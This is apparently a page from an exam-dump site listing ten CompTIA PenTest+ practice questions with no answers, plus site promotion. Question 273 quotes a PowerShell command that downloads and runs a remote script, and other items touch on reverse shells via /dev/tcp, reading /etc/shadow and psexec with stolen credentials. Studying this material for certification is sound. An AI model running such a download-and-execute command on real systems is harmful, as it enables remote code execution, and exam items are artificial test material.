PT0-001 Exam Details

  • Exam Code
    :PT0-001
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :306 Q&As
  • Last Updated
    :Apr 01, 2024

CompTIA PT0-001 Online Questions & Answers

  • Question 271:

    During a penetration test, a host is discovered that appears to have been previously compromised and has an active outbound connection. After verifying the network activity is malicious, which of the following should the tester do?

    A. Inform the client to shut it down and investigate.
    B. Take action and shut it down immediately.
    C. Inform the client and allow them to respond.
    D. Note the finding and continue the assessment.

  • Question 272:

    An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK Which of the following attack vectors would the attacker MOST likely use?

    A. Capture a three-way handshake and crack it
    B. Capture a mobile device and crack its encryption
    C. Create a rogue wireless access point
    D. Capture a four-way handshake and crack it

  • Question 273:

    Consider the following PowerShell command:

    powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-Cmdlet

    Which of the following BEST describes the actions performed this command?

    A. Set the execution policy
    B. Execute a remote script
    C. Run an encoded command
    D. Instantiate an object

  • Question 274:

    When communicating the findings of a network vulnerability scan to a client's IT department which of the following metrics BEST prioritize the severity of the findings? (Select TWO)

    A. Threat map statistics
    B. CVSS scores
    C. Versions of affected software
    D. Media coverage prevalence
    E. Impact criticality
    F. Ease of remediation

  • Question 275:

    Which of the following are MOST important when planning for an engagement? (Select TWO).

    A. Goals/objectives
    B. Architectural diagrams
    C. Tolerance to impact
    D. Storage time for a report
    E. Company policies

  • Question 276:

    Which of the following vulnerabilities are MOST likely to be false positives when reported by an automated scanner on a static HTML web page? (Choose two.)

    A. Missing secure flag for a sensitive cookie
    B. Reflected cross-site scripting
    C. Enabled directory listing
    D. Insecure HTTP methods allowed
    E. Unencrypted transfer of sensitive data
    F. Command injection
    G. Disclosure of internal system information
    H. Support of weak cipher suites

  • Question 277:

    During the information gathering phase, a penetration tester discovers a spreadsheet that contains a domain administrator's credentials. In addition, port scanning reveals that TCP port 445 was open on multiple hosts. Which of the following methods would BEST leverage this information?

    A. telnet [target IP] 445
    B. ncat [target IP] 445
    C. nbtstat -a [targetIP] 445
    D. psexec [target IP]

  • Question 278:

    A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?

    A. Ensure the scanner can make outbound DNS requests.
    B. Ensure the scanner is configured to perform ARP resolution.
    C. Ensure the scanner is configured to analyze IP hosts.
    D. Ensure the scanner has the proper plug -ins loaded.

  • Question 279:

    Which of the following can be used to perform online password attacks against RDP?

    A. Hashcat
    B. John the Rippef
    C. Aircrack-ng
    D. Ncrack

  • Question 280:

    A penetration tester has successfully exploited a vulnerability on an organization's authentication server and now wants to set up a reverse shell. The penetration tester finds that Netcat is not available on the target. Which of the following approaches is a suitable option to attempt NEXT?

    A. Run xterm to connect to the X-server of the target.
    B. Attempt to escalate privileges to acquire an interactive shell.
    C. Try to use the /dev/tcp socket.
    D. Attempt to read out/etc/shadow.

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-001 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.